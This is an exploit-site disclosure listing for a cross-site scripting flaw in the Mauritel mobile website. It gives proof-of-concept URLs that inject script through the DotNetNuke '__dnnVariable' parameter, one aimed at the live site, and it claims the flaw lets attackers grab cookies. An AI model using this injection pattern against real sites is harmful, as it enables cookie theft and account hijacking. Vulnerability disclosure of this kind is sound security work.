Mauritel Mobile XSS Vulnerability

2016.09.30
mr xBADGIRL21 (MR) mr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : Mauritel Mobile XSS Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://www.mauritel.mr # Tested on: [ WIN 10] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 29/09/2016 # video Proof : https://youtu.be/BOcJN42U9uM ###################### # [★] DESCRIPTION : ###################### # [+] Telecommunication Mauritel Mobile Website # [+] Is Suffering From Cross-Site Scripting Vulnerability # [+] AND that May Allow Attackers to get Cookies and Data ...etc ###################### # [★] Poc : ###################### # http://127.0.0.1/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} # ... # http://www.mauritel.mr/?__dnnVariable={'__dnn_pageload':'alert(/Tested by xBADGIRL21/)'} ###################### # [★] Live Demo : ###################### # http://www.mauritel.mr ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/BOcJN42U9uM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top